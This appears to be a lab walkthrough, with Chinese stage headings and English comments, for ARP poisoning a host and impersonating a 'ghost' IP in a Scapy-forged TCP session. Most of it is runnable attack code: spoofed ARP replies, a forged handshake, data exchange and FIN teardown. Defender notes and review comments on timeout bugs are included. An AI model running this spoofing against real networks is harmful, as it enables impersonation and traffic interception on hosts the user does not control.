# 如果不需要伪装,就去掉阶段二,并将 ghost_ip 更改为 Kali 主机 A 的正常 IP
🟢 阶段一:启动受害者服务 (主机 B - 192.168.17.129)
# Host B: listen on TCP port 20003 (-l listen, -p port, -n no DNS lookups, -v verbose)
nc -nvlp 20003
🔵 阶段二:实施 ARP 欺骗 (主机 A - 终端 1)
# Host A, terminal 1: interactive Scapy shell; root is needed for raw-socket send/sniff
sudo scapy
在Scapy中:
victim_ip = "192.168.17.129"
ghost_ip = "192.168.17.17"
# Unsolicited ARP reply ("is-at", op code 2) claiming ghost_ip for this host's
# own MAC (Scapy fills hwsrc from the sending interface by default).  B's ARP
# cache then maps ghost_ip -> host A, which is what lets B's replies in stage
# three reach us.  Defender note: a static ARP entry for ghost_ip on B, or
# dynamic ARP inspection on the switch, would reject this reply.
reply = ARP(op="is-at", pdst=victim_ip, psrc=ghost_ip)
print(f"开始 ARP 欺骗: {ghost_ip} is at My_MAC ...")
# Resend indefinitely, one reply per second, with per-packet output silenced.
send(reply, loop=1, inter=1, verbose=0)
🔴 阶段三:冒充幽灵进行 TCP 握手 (主机 A - 终端 2)
# Host A, terminal 2: a second Scapy shell for the spoofed TCP session
sudo scapy
在Scapy中:
victim_ip = "192.168.17.129"
ghost_ip = "192.168.17.17"
target_port = 20003
my_port = 10003
isn = 1000  # our initial sequence number (chosen arbitrarily)
# Every segment carries ghost_ip as source; B's answers are addressed to
# ghost_ip and reach us only because of the stage-two ARP poisoning.
spoofed = IP(src=ghost_ip, dst=victim_ip)
# Step 1: SYN.
send(spoofed/TCP(sport=my_port, dport=target_port, flags="S", seq=isn))
# Step 2: wait for B's SYN+ACK on our port.  No timeout: this blocks until a
# packet matches the BPF filter.
synack_filter = "src host {} and dst host {} and tcp port {}".format(victim_ip, ghost_ip, my_port)
synack = sniff(filter=synack_filter, count=1)[0]
# Step 3: ACK.  B's SYN consumes one sequence number, so ack its ISN + 1; our
# own SYN likewise advances our sequence number by one.
my_ack = synack[TCP].seq + 1
my_seq = isn + 1
send(spoofed/TCP(sport=my_port, dport=target_port, flags="A", seq=my_seq, ack=my_ack))
print("三次握手完成!")
🟣 阶段四:多轮双向对话
💬 第一轮:A 说话 -> B 回复
msg1 = "Hello B, I am 17!\n"
spoofed = IP(src=ghost_ip, dst=victim_ip)
# PSH+ACK carrying the payload, using the seq/ack state left by the handshake.
send(spoofed/TCP(sport=my_port, dport=target_port, flags="PA", seq=my_seq, ack=my_ack)/Raw(load=msg1))
print("等待 B 的回复...")
# Block (no timeout) until B sends a PSH segment to ghost_ip on our port.
push_filter = ("src host {} and dst host {} and tcp port {} "
               "and tcp[tcpflags] & tcp-push != 0").format(victim_ip, ghost_ip, my_port)
reply = sniff(filter=push_filter, count=1)[0]
print(f"收到 B: {reply[Raw].load.decode().strip()}")
# Advance our state: B's ack number is the next sequence number it expects from
# us; our next ack must cover the payload bytes B just sent.
my_seq = reply[TCP].ack
my_ack = reply[TCP].seq + len(reply[Raw])
# Bare ACK so B does not retransmit its data.
send(spoofed/TCP(sport=my_port, dport=target_port, flags="A", seq=my_seq, ack=my_ack))
💬 第二轮:A 继续说话 -> B 再次回复
msg2 = "How are you B?\n"
spoofed = IP(src=ghost_ip, dst=victim_ip)
# Second PSH+ACK, continuing from the seq/ack state updated after round one.
send(spoofed/TCP(sport=my_port, dport=target_port, flags="PA", seq=my_seq, ack=my_ack)/Raw(load=msg2))
print("等待 B 的第二句回复...")
# Block (no timeout) until B's next PSH segment arrives.
push_filter = ("src host {} and dst host {} and tcp port {} "
               "and tcp[tcpflags] & tcp-push != 0").format(victim_ip, ghost_ip, my_port)
reply = sniff(filter=push_filter, count=1)[0]
print(f"收到 B: {reply[Raw].load.decode().strip()}")
# Same bookkeeping as round one: take B's ack as our next seq, and ack past
# B's payload.
my_seq = reply[TCP].ack
my_ack = reply[TCP].seq + len(reply[Raw])
# Acknowledge B's data.
send(spoofed/TCP(sport=my_port, dport=target_port, flags="A", seq=my_seq, ack=my_ack))
💬 第三轮:A 结束对话 (FIN)
# 发送 FIN+ACK
# Active close from our side: FIN+ACK with the current seq/ack state.
fin_pkt = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=my_port, dport=target_port, flags="FA", seq=my_seq, ack=my_ack)
send(fin_pkt)
print("已发送 FIN 断开连接")
# Wait up to 3 s for B's ACK of our FIN.
# NOTE(review): sniff() returns an empty list on timeout, so the trailing [0]
# raises IndexError rather than a readable error when nothing matches in 3 s.
# NOTE(review): the filter "tcp-ack != 0" also matches a segment that carries
# FIN+ACK; if B merges its FIN with this ACK, the second sniff below would have
# nothing left to capture — confirm against a packet capture before relying on
# two separate segments.
print("等待B对FIN的ACK确认...")
ack_fin = sniff(filter=f"src host {victim_ip} and dst host {ghost_ip} and tcp port {my_port} and tcp[tcpflags] & tcp-ack != 0", count=1, timeout=3)[0]
print("收到B的ACK确认")
# Wait up to 3 s for B's own FIN (B closing its side); same IndexError caveat
# as above if the timeout expires.
print("等待B的FIN...")
fin_b = sniff(filter=f"src host {victim_ip} and dst host {ghost_ip} and tcp port {my_port} and tcp[tcpflags] & tcp-fin != 0", count=1, timeout=3)[0]
print("收到B的FIN")
# Update seq/ack from B's FIN: its ack number is the sequence number it expects
# from us next, and its FIN consumes one sequence number.
my_seq = fin_b[TCP].ack # sequence number B expects next
my_ack = fin_b[TCP].seq + 1 # B's seq + 1 (the FIN consumes one)
# Final ACK of B's FIN, completing the close from our side.
fin_ack = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=my_port, dport=target_port, flags="A", seq=my_seq, ack=my_ack)
send(fin_ack)